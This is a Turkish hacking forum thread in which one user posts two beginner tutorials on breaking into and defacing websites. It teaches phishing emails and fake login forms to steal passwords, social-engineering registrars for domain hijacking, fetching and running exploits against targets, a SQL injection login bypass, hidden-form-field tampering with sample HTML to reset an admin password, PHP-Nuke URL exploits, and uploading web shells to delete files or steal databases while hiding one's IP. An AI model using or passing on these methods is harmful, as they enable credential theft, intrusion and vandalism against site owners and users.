04-01-2014, 05:03 AM | #1 | |||||||||
Üyelik tarihi: Jan 2014
Üye Grubu: Üye
Mesajlar: 430
Konular: 226
Şube: Ankara Şubesi İlişki Durumu: İlişkisi Yok
Ruh Hali:
Tuttuğu Takım:
Level: 19 [] Paylaşım: 0 / 456 Teşekkürler: 281 30 Mesajına 31 Kere Teşekkür Edildi REP Gücü : 11
REP Puanı : 30
REP Seviyesi :
|
Hacker dersleri 1-2
YENİ BAŞLAYANLARA GENİŞ HACKING ANLATIMI // 1. BÖLÜM
Değerli arkadaşlar, forumlardaki bilgilerin derlenmesi ve basite indirgenerek yazılması gerektiğine inanıyordum. Bunun için araştırdım, bu sırada kendim de geliştim. Şimdi, yeni başlayanların anlayabileceği düzeyde, geniş açıklamalı & içerikli bir döküman olması için bunu yazıyorum. Sıfırdan başlayan arkadaşlar için çok faydalı, "vasat" arkadaşların da içinde ufak detaylar bulabileceğini düşündüğüm bir döküman... Umarım faydalı olurum. Bu anlatımlarda, pratikten ziyade teorik bilgi vermek durumundayım ama, teoriyi oldukça geniş tuttuğum için pratik yapmanız kolaylaşacak inşAllah. Bunun yanında öğrendiklerinizi misyon dahilinde faaliyete geçirmeniz için çalışmanız gerekiyor. Anlatılanları pratiğe geçirirken karşılaştığınız soru(n)ları buraya veya başlı başına açtığınız bir forum konusuna yazarsanız yardımcı oluruz... Veya MSNM gibi iletişim programlarıyla da kafanıza takılanları "usta"larımıza sorabilirsiniz. Bu kadar nutuktan sonra, başlayalım... Web sitelerini hack’lemek için kullanılan iki yöntem vardır, domain ve host hack. Domain sitelerin adresidir, hosting ise siz sitenin adresini yazdığınızda yönlendiğiniz bilgisayardır, yani sitenin içerisindeki tüm dosyaları barındıran bilgisayarlar... Örneklendirecek olursak E-hack.org | Hacking, Güvenlik, Kriptografi bir domain’dir. Fakat bu sitede bulunan tüm dosyalar, bir hosting firmasının bilgisayarları içindedir. Siz adres bar’ınıza E-hack.org | Hacking, Güvenlik, Kriptografi yazdığınızda, e-hack.org’un dosyalarının bulunduğu bilgisayara yönlenirsiniz. Bir sitenin domain’ini hack’lediğinizde, o domain’i sizin "hacked by xxx" yazan sayfanıza yönlendirirsiniz ve bu şekilde siteyi hack’lemiş olursunuz. Hosting hack’te ise, direkt olarak sitenin içeriğini değiştirir, Admin kullanıcısının ayarları ile oynar, yönlendirme ile filân uğraşmazsınız. Şimdi yöntemlerden bahsedeyim... Mail-hack: Domain hack için kullanılan en önemli yöntemlerden birisi mail hack’tir. Önce www.arama.com/domain.php3 gibi adresleri kullanarak hedefimizdeki siteye whois çekeriz (Whois çekeriz dedim de kafanız karışmasın; sadece verdiğim adrese gidip karşınıza çıkan kutucuğa hedefteki sitenin ismini girip ilgili düğmeye tıklamanız yeterli ) ) ve orada admin mail veya technical contact gibi kısımlarda yazan mail adresini hack’leriz. Daha sonra bu whois bilgilerinde yazan domain veya host firmasına (ns1.xxx.com, ns2.xxx.com, veya register through yazan yerlerden kopya çekebilirsiniz, birazcık İngilizce’yle olayı anlayabilirsiniz zaten) hack’lediğimiz adresten mail atarız ve deriz ki: "şifremi unuttum, siteme giriş yapamıyorum. Yani size rahatsızlık vermek istemem ama şu şifremi, görmüş olduğunuz bu mail’e atar mısınız?". Eğer size direkt olarak şifreyi yollamak yerine "Dur bakalım birader... Senin adın, yaşın, şeklin şemalin, yani bize kayıt olurken kullandığın bilgilerini bir gönder bize ki, senin o sitenin sahibi olduğuna inanalım ve sana şifreyi yollayalım. Ne malum senin siteyi hack’lemeyeceğin?" gibi bir cevap gelirse, whois bilgilerinin arasında bulunan admin-name, admin-city gibi bilgileri derleyin, şöyle bir kalıba oturtun ve sizden üye olurken kullandığınız bilgilerinizi isteyen şirkete yollayın... Hack’lemek istediğiniz sitenin domain veya host şirketi (genelde aynı şirket olurlar) size şifreyi yollayacak... Veya hiç mail yazmakla uğraşmadan, domain şirketinin sitesine girersiniz ve orada online olarak şifrenizi yolladıkları "Şifremi Unuttum!" gibi bir link varsa orayı kullanırsınız. Onlarda size şifreyi yollar... Eğer şifre gelirse, bu şifreyi sitenin FTP’sinde de deneyerek sonuca ulaşabilirsiniz (belki, çünkü kullanıcı adı da lazım FTP’lerde ve bu çok değişik kelimeler olabilir, siteadi.com olmayabilir kullanıcı adları büyük ihtimalle! En iyisi manuel olarak muhtemel kullanıcı isimlerini denemek veya finger çekmek -ki uzun iştir finger çekmek, konu dağılmasın. O yüzden burada yazmıyorum nasıl yapıldığını, ilerleyen bölümlerde yeri gelince kısaca değineceğim.-...) veya domain şirketini kullanarak, domain’i içinde "Hacked by xxx" yazan bir adrese yönlendirebilirsiniz...) Tabii bu anlattıklarım için, öncelikle mail-hack’ten biraz anlamanız gerekiyor. O yüzden size şu anda hatırladığım birkaç mail-hack yöntemini yazayım: 1. Fake mail: Tecrübesiz kullanıcıların mail’lerini almak için bire bir. Kurbana bir anonymous mail (Anonymous Mail=Belli bir mail adresinizin olması gerekmeden atabildiğiniz, kimlik bilgilerinizi taşımayan mail’lerdir denebilir) yollayan (aenima mail bomber gibi çoğu mail-bomber bu işi yapabiliyor) bir program veya bir fake mail/anonymous mail sitesi (mesela anonymous mail hizmeti Anonymouse.org adresinde var) kullanarak fake mail atabilirsiniz. Direkt olarak fake kodunu HTML şeklinde kendi elinizle yazabilirsiniz, ama "bununla uğraşamam" derseniz hazır fake kodlarını ve fake mail sitelerini kullanabilirsiniz. Tam yeri gelmişken söyleyeyim arkadaşlar, Hacking ile uğraşacaksanız en azından HTML’i bari bilin. Hazır fake kodlarını veya fake sitelerini de kullanabilirsiniz ama emin olun ki hiç bir kod sizinkinden güzel olamaz!.. Sadece Fake’de değil, her konuda lâzım HTML... Bunu öğrenin en azından... Bunun yanında "yok, ben uğraşamam, işim acele" gibi şeylerle kendinizi avutmak istiyorsanız veya fake kodu yazmaya üşeniyorsanız, Sizin için yazdığım bir çok fake kodları var onları kullanabilirsiniz[mail hacking bölümünde] ...Ayrıca Fake sitelerinden bazılarını biraz aşağıda veriyorum. Öncelikle, fake mail’in mantığı nedir? Fake mail’de, adama kullandığı mail account şirketinden, veya -daha kesin sonuç alabilirsiniz- adamın üye olduğu herhangi bir portaldan bir mail atıyormuş ve onun şifresine ihtiyaç duyuyormuş gibi davranıyorsunuz. Örneğin adama members@yahoo.com adresinden mail atıyormuş gibi gösteriyorsunuz (farklı bir mail’den geliyormuş izlenimi verme özelliği hemen hemen tüm fake mail sitelerinde veya anonymous mail programlarında vardır), ve onun size yolladığı şifresi sizin belirttiğiniz mail adresine geliyor, yani sizin mail’inize. Meselâ siz Mynet yöneticisisiniz, "bir kullanıcı sizin siteniz hakkında bir şikayette bulundu, inceleme yapacağız" dersiniz ve "kullanıcı adı", "parola" ve bir de "sitenizin kısa tanımı" başlıklı 3 adet kutu gösterirsiniz. Formu kendi mail adresinize yönlendirirsiniz. Adam şifreyi yazıp gönder düğmesine bastığı an şifreyi siz alırsınız. Veya ne bilim, adama "üyelik aktivasyonu" başlığıyla bir mail atarsınız ve adamın üyeliğinin aktifliğinin korunabilmesi için size kullanıcı adı ve şifresini göndermesini söyleyebilirsiniz. Onun üye olduğunu bildiğiniz bir web sitesinin admin’i olarak ona mail atarsınız ve dersiniz ki "Sitemiz yeniden yapılanma içerisine girmiştir. Kullanılmayan hesaplar sebebiyle hem şirketimiz zor durumda kalmakta, hem de size verdiğimiz hizmetlerde aksamalar görülmektedir. Eğer sitemizi kullanmaya devam etmek istiyorsanız kullanıcı adınızı ve şifrenizi aşağıdaki kutulara girin (/aşağıdaki linkteki forma yazın)...." vs. diyebilirsiniz. Veyahutta... Önce kurbana saçma sapan birkaç adet mail atarsınız(mail-bomb yaparsınız) mesela "ERROAR 0013e5B" gibi saçma sapan bir içeriği olur. Sonra adamın mail aldığı şirketin üyelik hizmetkârı olarak bir mail atar ve dersiniz ki: "üyelik hesabınızda bir problem çıktı, üyeliğinizi yeniden yapılandırmamız için bize kullanıcı adı ve şifrenizi yollayın." Bunun gibi yalanlarla adamın şifresini istiyorsunuz ve adam sizin kendi mail adresinize veya hazırladığınız Fake script’ine yönlenmiş olan forma şifresini gönderdiği an, artık size kalan şifre ve kullanıcı adını mail sitesinin login kısmına girip mail’i hack’ledikten sonra, kullanıcı şifresi ve gizli soru gibi çeşitli bilgileri değiştirmek... Ve ardından, hiç vakit geçirmeden host veya domain şirketinden şifreyi istemek. Bu arada atlanmaması gereken bir konu var ki, bazı siteler HTML hâlinde gönderilen mail’leri biçimlendirmiyor, kodları gösteriyor (Mynet). Bunu atlatabilmek için stratejik bir site alıyorsunuz (mesela uyelikservisi.sitemynet.com gibi -mynet için inandırıcı olur bu tabii ki-) ve attığınız mail’de diyorsunuz ki: "aşağıdaki linke tıklayın ve bize şu şu şu sebepten dolayı yollamanız gereken bilgilerinizi gönderin." Aşağıdaki linkin bulunduğu siteye siz fake kodunu atıyorsunuz ve sonuçta mail sizin. Fake sonuçlarının size ulaşabilmesi için kendi fake servisinizi de kurabilirsiniz. Mesela ücretsiz asp host’u veren websamba.com gibi bir yerden site alırsınız, CW’nun Programlar/illegalPort kategorisinde iP Personal Fake zip’indeki default.asp, kayit.asp ve db/fakes.mdb dosyalarını upload edersiniz bu bedava ASP destekli adresinize, sonra da paketteki hazır HTML kodunu veya kendi yazdığınız kodu <form action="..." kısmındaki yeri değiştirip meselâ <form action="http://www.websamba.com/Websamba daki_Kullanici_Adiniz/kayit.asp" şeklinde ayarlarsanız, sonuç alırsınız. Veya hiç uğraşmadan da hazır fake sitelerini kullanabilirsiniz... Bir kaç tanesi: Build a Free Website with Web Hosting | Tripod - www.siberkorsan.net/fake/index.php www.hademeler.netteyim.net/fakemail.htm Build a Free Website with Web Hosting | Tripod Build a Free Website with Web Hosting | Tripod www10.brinkster.com/Dostturk/fake.htm www.kingsoffalcons.com/fake/index.php TR.CX URL Yönlendirme Build a Free Website with Web Hosting | Tripod Fake konusu biraz da sizin yaratıcılığınıza bağlı... Temel olarak mantığı yukarıdaki gibi... Tabii ki fake atarken kullanılan dilin resmî ve nazik olması önemli. Bunun yanında sonuna "Mynet A.Ş.", "Hotmail", "Yahoo! Member Services" gibi şeyler yazarsanız daha inandırıcı olur. Lâkin Doktor’a gönderilen fake(!)’deki gibi "saygılarımızla yahoo a.ş." yazarsanız millet sadece sizinle dalga geçer...) Bu arada, fake’inizde adamın mail’inin alınmış olduğu şirketin sürekli kullandığı logosuna, resimlerine, linklerine de mail’iniz içerisinde yer verirseniz daha inandırıcı olur... ("Acaba onu Nası yapacam?" demeyin, hiç olmazsa HTML’i öğrenin be arkadaşlar! Tabii ki <img> ve <a> etiketleriyle)) http://i.hizliresim.com/epnv8r.pnghttp://img207.imageshack.us/img207/3926/76440890.gif http://a1212.hizliresim.com/14/m/h1l2r.png |
|||||||||
düŞ Kullanicisinin Son 5 Konusu | |||||
Baslik | Kategori | Son Yazan | Cevaplar | Okunma | Son Mesaj |
Hacker dersleri 1-2 | Webmaster Programları | düŞ font> | 1 | 7786 | 04-01-2014 05:03 AM |
Telnet komutları | HayalSohbet.Net Özel | düŞ font> | 0 | 3317 | 04-01-2014 04:36 AM |
Telnete nasıl girerim | Genel Paylaşım | düŞ font> | 0 | 4112 | 04-01-2014 04:29 AM |
En güzel forum siteleri | Duyurular | düŞ font> | 1 | 3244 | 03-30-2014 05:41 AM |
Bedava sohbet odaları | HayalSohbet.Net Özel | düŞ font> | 2 | 3159 | 03-30-2014 05:33 AM |
04-01-2014, 05:07 AM | #2 | |||||||||
Üyelik tarihi: Jan 2014
Üye Grubu: Üye
Mesajlar: 430
Konular: 226
Şube: Ankara Şubesi İlişki Durumu: İlişkisi Yok
Ruh Hali:
Tuttuğu Takım:
Level: 19 [] Paylaşım: 0 / 456 Teşekkürler: 281 30 Mesajına 31 Kere Teşekkür Edildi REP Gücü : 11
REP Puanı : 30
REP Seviyesi :
|
YENİ BAŞLAYANLARA GENİŞ HACKING ANLATIMI // 2. BÖLÜM
Exploit meselesiyle başlayalım... Hack konusu içinde çok büyük bir önemi olan Exploit’ları en ince detayına kadar anlatmam mümkün değil, ama size mantığını ve konu hakkında bazı noktaları anlatacağım. (Konuyla ilgili herşey anlatılabilecek olsaydı, forumlarda "exploits/vulnerabilities" diye başlı-başına bir topic olur muydu?...). Aslında hack’lenen sitelerin büyük bir bölümünün bu yöntemle indirildiğini söyleyen arkadaşlar da yok değil. Ben buna çok da inanmamakla beraber, başarılı ve "uzun ömürlü" bir "defacer" olmak isteyenlerin mutlaka ilgilenmeleri gereken bir konu olduğunu düşünüyorum bu konunun. Neyse... Konuya geçelim... Exploit’lar sayesinde bir sitede veya bir hosting bilgisayarında en yetkili kişi olmak mümkün. Amacı bu. Sizi o sitede veya server’da en yetkili kişi (yönetici) yapmak. En yetkili kişi olunca da, o site veya server’daki tüm siteler konusunda her istediğinizi yapabilirsiniz. Exploit’lar local ve remote olmak üzere iki şekilde yazılır. Local exploit’ları kullanabilmek için o hosting firmasında sizin de bir hesabınızın -yani bir sitenizin- olması gerekir. Local exploit’larla server’daki sitelerin hepsini hack’leyebilirsiniz. Remote exploit’ları kullanabilmek için server’da bir hesabınızın olması gerekmez, kendi bilgisayarınızda exploit’u çalıştırabilirsiniz. Tüm server değil, tek siteyi deface edersiniz... Aralarındaki fark bu... Exploit’lar genelde derlenmesi gereken kodlardır. Bazen, nadiren de olsa online çalıştırabileceğiniz exploit’larda bulabilirsiniz. Meselâ aşağıda verdiğim exploit, online olarak çalıştırılabilir ve sizi PHP-Nuke 6.5 ile yapılmış sitelerde admin yapar. Link: http://packetstormsecurity.nl/0310-e...p-nuke.6.5.php Fakat çoğu exploit yukarıda verdiğim gibi online olarak, bir siteden çalıştırılamaz. Bunlar için önce hosting bilgisayarının, yani server’ın hangi işletim sistemini kullandığını öğrenmelisiniz. Bunun için Netcraft | Internet Research, Anti-Phishing and PCI Security Services sitesine gidip sol üst kısımdaki yere sitenin ismini yazarsınız. search dediğiniz zaman sitenin hangi işletim sistemi üzerinde çalıştığını öğrenirsiniz. Daha sonra da bu sistemin exploit’unu bulur, siteyi hack’lersiniz. İşletim sistemlerine göre exploit’ları, exploit portalı olarak adlandırabileceğim www.packetstormsecurity.nl , www.phreak.org/html/exploits.shtml ve hack.co.za gibi adreslerden bulup indirirsiniz veya google’da işletim_sisteminin_adı exploit şeklinde aramalar yaparak istediğiniz exploit’u çekebilirsiniz. Şunu da hatırlatayım; sizi bir sistemde en yetkili kişi yapan exploit, farklı sistemde işe yaramaz. Söz gelimi bir linux exploit’u windows NT’de iş görmez... Exploit’lar genelde .C veya .PL uzantılıdır, bazıları ise çok az da olsa online çalıştırılabilir PHP dosyalarıdır, yukarıdaki örnekteki gibi... Önce ilgili exploit’u bilgisayarımıza download ediyoruz. Exploit’un uzantısı .c ise bunu shell’de derlememiz lazım. Shell nedir? Shell hesabı aldığınızda sürekli ve hızlı bir net bağlantısı olan bir makinede, linux komutları çalıştırabileceğiniz bir yeriniz olur. Biraz web sitesi mantığına benziyor. Web sitelerinde bir hosting alırsınız ve buraya dosyaları upload edebilirsiniz, Shell’de ise aldığınız yerde Linux komutları çalıştırabilirsiniz. Aralarında böyle bir benzerlik ve fark var. Tabii Shell’i daha da geniş anlatmak mümkün ama biz de zaten Shell’in Linux komutu çalıştırma özelliğinden faydalanarak exploit’ları derleyeceğiz. Net’te bedava shell’ler var, fakat bu shell’lerin işimize yaraması çok zor. Çünkü içerikleri geniş tutulmaz bunların... O yüzden paralı shell alınması veya bilgisayarınıza Linux kurulması gerekebilir (veya bir arkadaşınızdan Shell hesabı bulabiliyorsanız bulun derim). "Bedava Shell veren adresler" isimli bir konuyu, baya önceleri HellRazor arkadaşımız açmıştı, exploits/vulnerabilities bölümündeki eski sayfaları karıştırırsanız bulabilirsiniz sanırım. Ben link vermiyorum burada, çünkü vereceğim link büyük ihtimalle işe yaramayacaktır. Varsayalım ki bir yerden işimize yarayabilecek, sağlam altyapılı bir shell temin ettik. Bunlarla exploit’larımızı şöyle derleriz: Öncelikle indirdiğimiz exploit dosyasını -ismini değiştirmeden- bir web sitesine atıyoruz, Mynet, Websamba vs. olabilir. Sonra Shell hesabımıza Putty programını kullanarak bağlanıyoruz. Bu programın amacı kısaca Shell kurulu bilgisayarlara bağlanmaktır -Hani web sitelerinin FTP’sine ulaşmak için CuteFTP gibi programlar kullanıyoruz ya, bunu da bir nevi buna benzetebilirsiniz.-. Shell’e bağlandıktan sonra, şu komutu yazıyoruz: wget http://exploit u_attiginiz_site/exploit_adi.c Bu komutla shell exploit’u bünyesine çekecektir. Dosyanın çekilip çekilmediğini ls yazarak çıkan dosya listesinden exploit’un ismini görürseniz anlarsınız, çekilmiş demektir. Daha sonra şunu yazmalısınız: gcc -o exploit exploit.c Burada shell, exploit.c dosyasını derleyecek ve derlenmiş hâlinin adını exploit yapacaktır. Daha sonra bu exploit dosyasını: ./exploit yazarak çalıştırabilirsiniz. Bunu yazdığınızda, karşınıza gelecek ekranda Exploit’un nasıl kullanılacağını anlatan yazılarla karşılaşacaksınız. Bu ekranı da okuyarak exploit’un nasıl çalıştırılacağını öğrenebilirsiniz ama, genelde exploit’lar: ./exploit -h hacklenecek_site veya... ./exploit -i Hacklenecek_sitenin_IP’si yazarak çalıştırılır. Burada yanlış anlaşılma olmasın, ./ işaretlerinden sonra exploit’un ismini yazacağız. Söz gelimi exploit’umuzun adı exp.c ise, gcc -o exp exp.c ve sonra da ./exp -h xxx gibi kullanmalısınız. Bu arada server sahibi exploit’un önlemini aldıysa işe yaramazlar, tabii ki. şimdi de çok kısa olarak PERL’de exploit derlemekten bahsedelim... .PL uzantılı exploit’leri derleyebilmek için öncelikle Active PERL programını download etmelisiniz. Link: ActivePerl Downloads - Perl Binaries for Windows, Linux and Mac Buradaki programı download ettikten sonra kuruyoruz. Kurulumu yarıda kesmeyin. Biraz uzun sürebilir. Kurulum bittikten sonra, hack’lenecek sitenin host’unda kurulu olan sistemi öğreniyoruz ve exploit’unu buluyoruz. Sonra bu exploit’u cerlin klasörüne kopyalıyoruz. Bunu çalıştırmak için, MS-Dos Komut İstemi’ni açıyoruz ve orada cerlin klasörüne geçiyoruz. ("Nasıl geçeceğim?" gibi bir soruyu kabul etmiyorum . Hiç yoktan birazcık Dos temeliniz olsun arkadaşlar. Bilgisayardan hiç çakmayan arkadaşların bu konularla uğraşması ne denli doğrudur, bilmiyorum.) Ama hadi yazayım yine de: MS-DOS Komut İstemini açtığınızda, sizi otomatikmen C:windows klasörüne atar. Burada cd..perlin yazıp enter’layın. Bu komutla o klasörü açabilirsiniz. Burayı açtıktan sonra Perl hazır hâle geliyor. Burada, şunu yazarak exploit’umuzu kullanılır hâle getiririz: perl exploit.pl -h www.kurban.com Enter’landığında, kurban server’ın açıkları kapanmamışsa, sitede en yetkili kişi olursunuz. Devamı ise exploit’un özelliklerine bağlı. Exploit’unuz nelere izin veriyorsa, onları yapabilirsiniz. Allah yardımcınız olsun. Exploit konusunda anlatacaklarım bu kadar. Bazı arkadaşlar belki anlamamışlardır ama başta da söylediğim gibi anlatılması, programlama dillerinin mantığından ve shell, linux gibi konulardan bîhaber arkadaşlar için çok zor. Fakat yukarıdaki bölümün size yine de bir mantık vermiş, bir şeyler anlatmış olması gerekir diye düşünüyorum. Kafanıza takılanları sorarsanız -ben dahil- yardımcı olacak pek çok arkadaş çıkacaktır emin olun... Hack yöntemlerinden birisi de ASP ve PHP gibi dillerin açıklarından faydalanmak. Bu açıklar sizi genelde Administrator seviyesine yükselten açıklar... Siteye Admin olarak girdiğinizde de zaten istediğinizi sistemden atın, istediğinizin şifresini alın, hatta sitenin ortasına "HaCKeD BY XXX" yazın... Bu tip açıklara biraz örnek vermek gerekirse: ’or’’=’ açığı: Önlemi alınmamışsa sizi administrator seviyesine yükselten bir açık. Üyelik sistemli ASP sitelerinde geçerli. Aslında sitede bir admin giriş yeri varsa ama bu sitenin direkt olarak anasayfasından ulaşılamıyorsa, yani index’te "admin girişi" diye bir yer görünmüyorsa, öncelikle site üzerinde manuel denemeler yapmalısınız. Örneğin siteadı/admin.asp , siteadi/login.asp , siteadi/forum/admin.asp , /admin/admin.asp, /admin/login.asp vs... Eğer tutturamazsanız, google.com’a gidip: admin site: siteAdı.com şeklinde bir arama yaparsanız, google sizin için sitede admin kelimesi geçen tüm sayfaları gösterecektir. Bunun dışında, aspindir.com gibi hazır kod sitelerinden download ettiğiniz script’leri incelerseniz, admin panelinin nerede tutulduğunu öğrenebilirsiniz. İşinize yarayabilir. Bu bilgiden sonra, açığın nasıl kullanılacağını da kısaca yazalım. Kullanıcı adı/şifre girişi isteyen bir sitenin, bu bilgileri gireceğimiz formuna ulaşın (login form) ve aşağıdakileri ilgili kutuya yazın: Kullanıcı adı: ’or’’=’ Şifre: ’or’’=’ Her iki kutucuğa da aynı şeyi yazıyoruz ve şansımız varsa sitede "hoppala" admin oluyoruz! Formlardaki type="Hidden" değerini sömürmek: Genelde ASP destekli üyelik sistemleri üzerinde çalışan sitelerdeki bir açık. *Yasak Kelime* abi, *Yasak Kelime*hacker’ken bu konuda uzun bir döküman yazmıştı ("inputlar ve veri doğrulama" isminde), onu özetlemek istiyorum. Öncelikle üyelik sistemli bir siteye üye oluyoruz. Sonra kullanıcı adımızı kullanarak login oluyoruz. Çoğu sitede login olduktan sonra "bilgilerimi düzenle", "profil düzenle" vs. linkler olur ve bu bölümden kişi kendine ait pek çok bilgisini, hatta kullanıcı adı ve şifresini bile değiştirebilir. İşte "profilimi düzenle" anl"kötü söz filitrelendi" gelen linke tıklıyoruz ve sonra karşımıza bir form geliyor. Hemen "kaynağı görüntüle" diyoruz ve karşımıza aşağıdaki gibi bir form kaynak kodu geliyor: <form action="guncelle.asp" method="post"> <input type="hidden" name="islenecekkullaniciadi" value="eski_kullanici_adiniz_burada_yaziyor_olmali "> <br>Kullanıcı adı: <input type="text" name="yenikullaniciadi" value="eski_kullanici_adiniz_burada_da_yaziyor_ama _degistirilebilir"> <br>Şifreniz: <input type="password" name="yenisifre" value="Burada_sifreniz_yaziyor_olmali"> ..... <input type="submit" value="Bilgilerimi Güncelle" </form> Bu formda, action=".." kısmında belirtilen dosya form bilgilerini güncelleyecek olan dosyadır. <input type="hidden" yazan yerdeki kullanıcı adımız, type="submit" değerinde belirttiğimiz "Bilgilerimi Güncelle" düğmesine basıldığında action’da belirttiğimiz guncelle.asp dosyası tarafından değiştirilecek. type="text satırı ekrana bir kutucuk çıkartır ve bu örnekte bizden oraya yeni kullanıcı adımızın girilmesi isteniyor. type="Password" de ise yine ekrana bir kutucuk çıkar ve bunun içine yazılan herşey **** şeklinde görünür, şifredir çünkü. Şimdi, tekrarlayalım; örnekteki hidden’da üzerinde oynama yapılacak kullanıcı adı, text’te yeni kullanıcı adı, ve password’de de değiştirilebilir şifre yazıyor... O zaman, biz hidden="..." bölümüne "administrator"ın sitede kullandığı nick’ini yazarsak, ne olur??? Admin’in ismini, cismini, mail adresini, en önemlisi de kullanıcı adı ve de şifresini değiştirebiliriz!.. Kaynağı Görüntüle dediğimiz sayfanın kodlarını kopyala/yapıştır’la not defterine atalım ve ilk önce action=".." daki kısmın başına -eğer yoksa-http://www.hedeftekisite.com/varsa_alt_klasör/ ’u ekleyelim, sonra type="hidden" name="xxx" value="xxx" yazan yere type="hidden" name="xxx" value="admin’in_nick’i" yazalım, veya type="hidden"’ı type="text" şeklinde değiştirip, dosyayı .htm formatında kaydedelim. Eğer ikinci dediğimi yaparsanız, .htm uzantılı dosyayı çalıştırdığımızda karşımıza eski nick’imizin olduğu bir kutucuk daha çıkacak, oradaki yazıyı silip admin’in nick’ini yazmak yoluyla da bu işi hâlledebiliriz. Örneğin, oynama yaptığımızda kod şöyle olacak: <form action="http://www.hedeftekisite.com/guncelle.asp" method="post"> <input type="hidden" name="islenecekkullaniciadi" value="Sitenin_Admin’inin_kullandigi_nick"> (Veya <input type="text" name="islenecekkullaniciadi" value="adminin_nick’ini_buraya_yaz"> ) <input type="text" name="yenikullaniciadi" value="adminin_nick’i_ne_olacaksa_onu_yazın"> <input type="password" name="yenisifre" value="adminin_sifresi_ne_olacaksa_onu_yazin"> .... <input type="submit" value="Bilgilerimi Güncelle"></form> Bilgileri, yukarıda belirttiğim şekilde değiştireceksiniz. Bu arada benim örnekte .... ile gösterdiğim yerde çeşitli kutucuklar daha olması lâzım, meselâ mail adresi, web sitesi gibi. Buraları da kendinize göre uyarlamalısınız. Tüm bunları yaptıktan sonra kaydettiğimiz ve üzerinde oynamalar yaptığımız .htm dosyasını çalıştırın, ilgili bilgileri girdikten sonra "bilgilerimi güncelle" düğmesine basın ve admin nick ve şifresini değiştirmiş olun! Geriye kalan, sadece bu değiştirdiğiniz kullanıcı adı ve şifreyle sitenin üye giriş formunu süslemek ve "gönder"e basmak... Bu yöntemin çalışmama ihtimali var, bunun iki sebebi olabilir; birincisi bu üç-kâğıdın önlemi alınmıştır, ikincisi ise bir yanlışlık yaptınız, sitenin klasör düzeni uygunsuz veya formda ufak bir farklılık var. Bu ikinci nedeni HTML bilen arkadaşlar kolaylıkla atlatabilirler. Ben sadece örnek verdiğim için burada uzatmayacağım. Zaten anlamış olmanız lâzım... Bir PHP-Nuke Açığı: PHP-Nuke eski versiyonlarında işleyen bir açık: http://www.hedef.com/modules.php?nam...rinfo&bypass=o r%20true&username=kullaniciadi Bunu adres bar’ınıza yazacaksınız ve sondaki kullaniciadi yerine Administrator’ın sitede kullandığı nick’i yazacaksınız. Belki tutar, eski PHP-Nuke sürümlerinde... Bir PHP-Nuke açığı daha: www.hedef.com/modules/forums/admin/index.php Nadiren de olsa sizi şifresiz olarak admin paneline sokabilir. Sonrası malum... Açıklarla hacking’in temel mantığını anlamanız için bu kadar örnek yeterli. Birincisi açığını kullanacağınız dillerle ilgili iyi bir bilgi sahibi olmalısınız, ikincisi bildiklerinizi küçümsemeden -lamerlik-mamerlik demeden- yaratıcılığınızı kullanacaksınız ve üçüncüsü ise en yeni açıkları takip edeceksiniz. Bu tip açıkları, meselâ Cyber-security.org, olympos.org, * Yasak Kelime Kullandınız *.org, securityfocus.com gibi "Ben güvenlik portalıyım" diyen yerlerden öğrenebilirsiniz, çünkü bu siteler "bakın... böyle böyle bir açık var, bunu kapatmazsanız şöyle-böyle olur, o yüzden şu açığı şu şekilde kapatın" derken, aynı zamanda açığında ne olduğunu dile getirdiklerinden, çok faydalı olabilirler)... Bir başka hack yöntemi ise Listpath kullanmaktır. Bunlar, server’daki klasör ve dosyaları görmemizi, onlar arasında dolaşmamızı ve onlar üzerinde bazı işlemler yapmamızı sağlayan ASP veya PHP dosyalarıdır. Bu dosyaları sitenin hosting’ine bir şekilde sızdırırız. Eğer hosting bilgisayarında, yani server’da FileSystemObject açığı varsa (tabii ki windows sistemlerde bu açık olabilir, linux’ta başka isimler alır bu açık), dosya silebilir, içeriklerini değiştirebilirsiniz. Önce bu listpath’lerden birini bir bilgisayarın host’una yutturuyoruz. Bunun bazı yöntemleri var. İşte birkaçı: * Brinkster, Websamba vs. gibi ASP desteği veren Web Sitelerinden kendimize bir hesap, yani bir beleş web sitesi açıyoruz. Sonra bir listpath upload ediyoruz ve browser’ın adres kısmına yolunu yazıp çalıştırıyoruz. * Bazı sitelerde upload özelliği vardır. google’da inurl:upload filetype:asp gibi çeşitli aramalarla ASP dosyalarını upload’a izin veren yerlere listpath’’in adını değiştirerek upload edebiliriz (örneğin test.asp gibi. Dikkat çekmemesi için...) Upload ettikten sonra dosyanın yolunu yazar ve çalıştırırız *Yasak Kelime*i, veya diğer listpath programcıklarını... * Hedefteki sitenin host firmasından deneme hostu alırız. Bazen gerek bile olmayabilir; zira FTP Kullanıcı adı: deneme şifre: deneme şeklinde hazır bir deneme hostu olabilir server’ın bünyesinde. Neyse... Siteye whois çekildiğinde, genelde en altta yazan ns1.xxx.com , ns2.xxx.com şeklindeki yerler hosting şirketinin sitesini verir. Buradan 1 aylık deneme hostu alır ve listPath’i yüklersiniz, sonra da paşa paşa çalıştırıp host’ta cirit atarsınız. Ya da para verip bir host alırsınız. (ASP destekli olmak zorunda) Bu gibi yöntemlerle listpath’i upload ettikten sonra, yolunu yazarak çalıştırabiliriz. Kullanımları aslında listpath’ten listpath’e değişir ama genelde klasörler arasında dolaşabilmek için linkler bulunur, sürücülere ulaşmak için düğmeler bulunur ve dosyaları silip değiştirmek, (hatta *Yasak Kelime*li şekerde download etmek) için linkler bulunabilir, bunları artık siz listpath’ten öğrenebilirsiniz. Şöyle bir göz gezdirerek, neyin ne olduğunu anlarsınız zaten. Şimdi de birkaç bilgi vereyim yine bu konuyla ilgili. Eğer bir yere ASP listpath’i yüklerseniz inetpub klasörüne ve oradan da wwwroot klasörüne gitmelisiniz. Genellikle burada tutulur sitelerin dosyaları... Eğer burada yoksa diğer dizinleri de deneyebilirsiniz. Ama elinizi mümkün olduğunca çabuk tutun ve mümkünse Proxy kullanarak IP’nizi gizleyin, her ihtimale karşı... Hack’lemeyi plânladığınız bir sitenin dosyalarını silmeyi ve kendi dosyanızı upload etmeyi deneyin. Eğer olmazsa, o server’da FileSystemObject açığı yok demektir. O zaman size düşen, MDB dosyalarını bulmak. Bazı Listpath’lerde (meselâ *Yasak Kelime*liŞeker’de), dosya arama kutuları bulunur. Buralara mdb yazın ve çıkan dosyaları indirin. Eğer böyle bir şey yoksa sitenin klasörlerini karıştırmalısınız... Eski konularda MDB’lerle ne yapabileceğinizi anlatmıştım, isterseniz 1. ve 2. bölüme geri dönüp hatırlayabilirsiniz... Şunu da söyleyeyim, MDB’leri ille de download etmek zorunda değilsiniz, MDB dosyalarını silerseniz siteyi çalışmaz hâle getirrirsiniz. Bozarsınız yani... Bunun dışında, crogram 